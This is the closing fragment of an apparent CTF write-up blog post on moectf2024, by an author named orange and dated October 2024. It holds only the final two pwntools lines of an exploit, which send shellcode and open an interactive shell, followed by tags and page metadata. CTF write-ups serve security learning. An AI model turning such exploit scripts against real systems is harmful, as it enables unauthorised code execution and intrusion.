p.send(shellcode)
p.interactive()
ctf
#ctf
moectf2024
https://0ran9ewww.github.io/2024/10/12/moectf/moectf2024/
作者
orange
发布于
2024年10月12日
许可协议